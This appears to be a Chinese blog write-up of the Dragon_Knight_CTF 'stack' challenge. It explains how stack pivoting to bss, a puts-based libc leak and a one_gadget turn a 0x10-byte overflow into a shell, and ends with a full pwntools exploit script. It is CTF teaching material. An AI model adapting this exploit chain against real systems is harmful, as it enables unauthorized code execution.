Dragon_Knight_CTF-stack（棧遷移）

山西小嫦娥發表於2024-06-07

Dragon_Knight_CTF-stack（棧遷移）

程式的保護情況如下，可以看到沒有開啟pie保護

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x3fe000)

可以看道main函式也很簡潔，只有一個0x10大小的溢位，程式給了libc，版本是2.31的

nt __fastcall main(int argc, const char **argv, const char **envp)
{
  char buf[256]; // [rsp+0h] [rbp-100h] BYREF

  inits();
  puts("Hello, CTFer, do you know how to stack pivoting?");
  read(0, buf, 0x110uLL);
  return 0;
}

思路分析

思路一：

可以看到返回地址是一個libc地址，我們只要將這個地址改成og地址就能拿到shell了，只不過這個比較看臉，1/4096的機率，理論上是可以拿到shell的，開多執行緒的話機會更大。但是對於我這種石頭剪刀布都沒有贏過別人的人，這種方法是行不通的。

思路二：

那就是棧遷移了，pwn最開始的棧遷移題目，一般是會給兩次read機會的，第一次讓我們往bss段上寫rop，第二次只給0x10大小的溢位空間讓我們進行棧遷移操作。

這道題只給了0x10大小的棧溢位空間，所以我們要想辦法，創造多次寫入的機會。

main函式的彙編：

.text:0000000000401176 ; __unwind {
.text:0000000000401176                 endbr64
.text:000000000040117A                 push    rbp
.text:000000000040117B                 mov     rbp, rsp
.text:000000000040117E                 sub     rsp, 100h
.text:0000000000401185                 mov     eax, 0
.text:000000000040118A                 call    inits
.text:000000000040118F                 lea     rdi, s          ; "Hello, CTFer, do you know how to stack "...
.text:0000000000401196                 call    _puts
.text:000000000040119B                 lea     rax, [rbp+buf]
.text:00000000004011A2                 mov     edx, 110h       ; nbytes
.text:00000000004011A7                 mov     rsi, rax        ; buf
.text:00000000004011AA                 mov     edi, 0          ; fd
.text:00000000004011AF                 mov     eax, 0
.text:00000000004011B4                 call    _read
.text:00000000004011B9                 mov     eax, 0
.text:00000000004011BE                 leave
.text:00000000004011BF                 retn
.text:00000000004011BF ; } // starts at 401176
.text:00000000004011BF main            endp

可以看到0x040119B，這行彙編會將rbp+buf的地址傳給rax，而0x04011A7又會將rax傳給rsi，之後會執行read函式，而rsi正是read函式的第二個引數，也就是要寫入內容的地址。

所以我們如果能控制了rbp，那麼這裡就相當於有一個任意寫。

到這裡思路就很明朗了，這裡的任意寫我們在bss段寫上rop，然後會執行leave ret，完成棧轉移。

第一次溢位：

magic = 0x0040119B   #lea rax,[rbp+buf]
bss_buf = 0x0404a00

payload = b'a'*0x100+p64(bss_buf+0x100)+p64(magic)
p.sendafter('pivoting?\n',payload)

因為是頁對齊，所以bss段其實是比較大的，bss段開始是0x404040，我這裡設定bss_buf是0x40a00，這兩者相差好幾百位元組。為什麼要這麼設定呢？因為假如在bss段執行rop，比如說執行read函式，在呼叫read函式的時候會向上申請棧，那麼他可能會申請到不可讀的空間，甚至會覆蓋到got表，這樣程式就直接carsh了，所以棧轉移一般要設定在bss段後面一點，以防發生類似的錯誤。

這裡首先就是將rbp設定成bss_buf+0x100，然後將會執行read(0,bss_buf,0x110)，在執行read函式的時候其實還沒進行棧轉移，棧轉移是在執行完read函式之後進行的。

第二次溢位：

payload = p64(pop_rdi)+p64(puts_got)+p64(puts)
payload+= p64(pop_rbp)+p64(bss_buf+0x100+0x30)+p64(magic)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf-8)+p64(leave_ret)
p.send(payload)

向bss_buf進行寫rop，用puts函式來洩露libc基地址。

之後透過調整rbp的值，再次呼叫magic函式來獲取任意寫，這次要寫入的地址其實是bss_buf+0x30。

第三次溢位：

payload = p64(pop_r12_r13_r14_r15)+p64(0)*4+p64(shell)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf+0x30-8)+p64(leave_ret)
p.send(payload)

再次完成棧轉移，將rip劫持到bss_buf+0x30去執行我們寫入的pop_r12_r13_r14_r15，用pop_r12_r13_r14_r15來使og可用，拿到shell。

棧轉移分析

為了方便理解，我畫了一些棧圖來幫助理解。

magic = 0x0040119B   #lea rax,[rbp+buf]
bss_buf = 0x0404a00

payload = b'a'*0x100+p64(bss_buf+0x100)+p64(magic)
p.sendafter('pivoting?\n',payload)

在執行完read函式，溢位後此時的棧空間：


rsp-->
	...
	0x7ffcb8008b70	aaaaaaaa
	...	aaaaaaaa
	0x7ffcb8008c58	aaaaaaaa
	0x7ffcb8008c60	aaaaaaaa
	0x7ffcb8008c68	aaaaaaaa
rbp-->	0x7ffcb8008c70	0x404b00
return_addr	0x7ffcb8008c78	magic

執行main函式本身的leave ret後：


	0x4049f8	0
	0x404a00	0
	0x404a08	0
	0x404a10	0
	0x404a18	0
	0x404a20	0
	0x404a28	0
	0x404a30	0
	...	0
rbp-->	0x404b00	0
	0x404b08

執行read(0,0x404a00,0x110)

payload = p64(pop_rdi)+p64(puts_got)+p64(puts)
payload+= p64(pop_rbp)+p64(bss_buf+0x100+0x30)+p64(magic)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf-8)+p64(leave_ret)
p.send(payload)


	0x4049f8	0
	0x404a00	pop_rdi
	0x404a08	puts_got
	0x404a10	puts
	0x404a18	pop_rbp
	0x404a20	0x40b30
	0x404a28	magic
	0x404a30	0
	...	0
rbp-->	0x404b00	0x4049f8
	0x404b08	leave_ret

第一次溢位將返回地址覆蓋為magic，執行完read後會帶一個leave ret指令，執行完leave ret指令的棧圖


rbp-->	0x4049f8	0
	0x404a00	pop_rdi
	0x404a08	puts_got
	0x404a10	puts
	0x404a18	pop_rbp
	0x404a20	0x40b30
	0x404a28	magic
	0x404a30	aaaaaaaa
	...	aaaaaaaa
	0x404b00	0x4049f8
rsp-->	0x404b08	leave_ret

rsp指向leave ret，將會再次執行leave ret指令，執行完的棧圖


	0x4049f8	0
rsp-->	0x404a00	pop_rdi
	0x404a08	puts_got
	0x404a10	puts
	0x404a18	pop_rbp
	0x404a20	0x40b30
	0x404a28	magic
	0x404a30	aaaaaaaa
	...	aaaaaaaa
rbp-->	0x404b00	0x4049f8
	0x404b08	leave_ret

puts(puts_got)

read(0,0x404a30,0x110)

payload = p64(pop_r12_r13_r14_r15)+p64(0)*4+p64(shell)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf+0x30-8)+p64(leave_ret)
p.send(payload)


	0x4049f8
	0x404a00
	0x404a08
	0x404a10
	0x404a18
	0x404a20
rsp-->	0x404a28
	0x404a30	pop_r12_r13_r14_r15
	0x404a38	0
	0x404a40	0
	0x404a48	0
	0x404a50	0
	0x404a58	shell
	...	0
	0x404b08	0
	0x404b10	0
	0x404b18	0
	0x404b20	0
	0x404b28	0
rbp-->	0x404b30	0x404a28
	0x404b38	leave_ret

執行跳轉到magic地址自帶的leave ret


	0x4049f8
	0x404a00
	0x404a08
	0x404a10
	0x404a18
	0x404a20
rbp-->	0x404a28
	0x404a30	pop_r12_r13_r14_r15
	0x404a38	0
	0x404a40	0
	0x404a48	0
	0x404a50	0
	0x404a58	shell
	...	0
	0x404b08	0
	0x404b10	0
	0x404b18	0
	0x404b20	0
	0x404b28	0
	0x404b30	0x404a28
rsp-->	0x404b38	leave_ret

rsp指向leave ret，將會再次執行leave ret指令，執行完的棧圖


	0x4049f8
	0x404a00
	0x404a08
	0x404a10
	0x404a18
	0x404a20
	0x404a28
rsp-->	0x404a30	pop_r12_r13_r14_r15
	0x404a38	0
	0x404a40	0
	0x404a48	0
	0x404a50	0
	0x404a50	shell
	...	0
	0x404b08	0
	0x404b10	0
	0x404b18	0
	0x404b20	0
	0x404b28	0
	0x404b30	0x404a28
	0x404b38	leave_ret

接下來執行pop_r12_r13_r14_r15，然後就拿到shell了。

exp

from pwn import *

p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
context(os='linux',arch='amd64',log_level='debug')

magic = 0x0040119B   #lea rax,[rbp+buf]
pop_rdi = 0x00401210
puts_got = elf.got['puts']
puts = elf.plt['puts']
leave_ret = 0x004011BE
read = elf.plt['read']
pop_rbp = 0x0040115d
bss_buf = 0x0404a00
og = [0xe3afe,0xe3b01,0xe3b04]

payload = b'a'*0x100+p64(bss_buf+0x100)+p64(magic)
p.sendafter('pivoting?\n',payload)

payload = p64(pop_rdi)+p64(puts_got)+p64(puts)
payload+= p64(pop_rbp)+p64(bss_buf+0x100+0x30)+p64(magic)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf-8)+p64(leave_ret)
p.send(payload)
libc_base = u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\x00'))-libc.symbols['puts']
print('libc_base-->'+hex(libc_base))

shell = libc_base+og[0]
pop_r12_r13_r14_r15 = 0x040127c

payload = p64(pop_r12_r13_r14_r15)+p64(0)*4+p64(shell)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf+0x30-8)+p64(leave_ret)
p.send(payload)
p.interactive()

棧遷移
2024-08-19
遷移公告
2020-12-18
【遷移】SqlServer 遷移到 MySQL 方法
2020-11-24
ServerMySql
docker映象遷移
2018-11-22
Docker
賬號遷移
2021-04-27
Jenkins Job遷移
2021-02-04
Jenkins
[論文閱讀] 顏色遷移-N維pdf遷移
2022-11-26
xtts遷移實踐
2018-10-18
TTS
Kafka資料遷移
2019-03-18
Kafka
ASM下遷移spfile
2018-06-27
ASM
Harbor資料遷移
2024-05-18
WSL2遷移
2024-05-05
遷移&新地址
2024-03-20
oracle遷移OCR盤
2023-12-25
Oracle
遷移ASM磁碟組
2019-11-18
ASM
gitlab資料遷移
2020-03-12
Gitlab
Homestead 怎麼遷移？
2020-08-14
Oracle遷移文件大全
2020-11-05
Oracle
Oracle遷移文章大全
2020-04-15
Oracle
webpack 4遷移指南
2019-04-26
Web
Codable 的遷移方案
2019-03-04
wsl docker 遷移 - windows
2024-08-15
DockerWindows
從Milvus遷移DashVector
2024-09-05
jenkins 遷移踩坑
2024-06-25
Jenkins
CDH/HDP遷移之路
2022-04-02
MongoDB遷移工具Mongoshake
2022-11-28
MongoDB
DBMotion——MySQL遷移利器
2022-11-25
MySql
cloudera manager server遷移
2021-02-03
CloudServer
資料庫遷移
2020-11-30
資料庫
Mysql百萬級資料遷移，怎麼遷移？實戰過沒？
2021-12-14
MySql
遷移學習系列---基於例項方法的遷移學習
2022-03-09
遷移學習
ESXI 遷移至KVM (V2V遷移)
2018-04-12
資料遷移（1）——通過資料泵表結構批量遷移
2018-10-30
什麼是遷移學習？什麼時候使用遷移學習？
2020-12-30
遷移學習
線上redis遷移思路
2019-03-03
Redis
oracle xtts遷移 AIX to Linux
2019-01-14
OracleTTSAILinux
專案遷移的思考
2019-03-07
Mysql資料遷移方法
2019-04-19
MySql

Dragon_Knight_CTF-stack（棧遷移）

Dragon_Knight_CTF-stack（棧遷移）

思路分析

棧轉移分析

exp

相關文章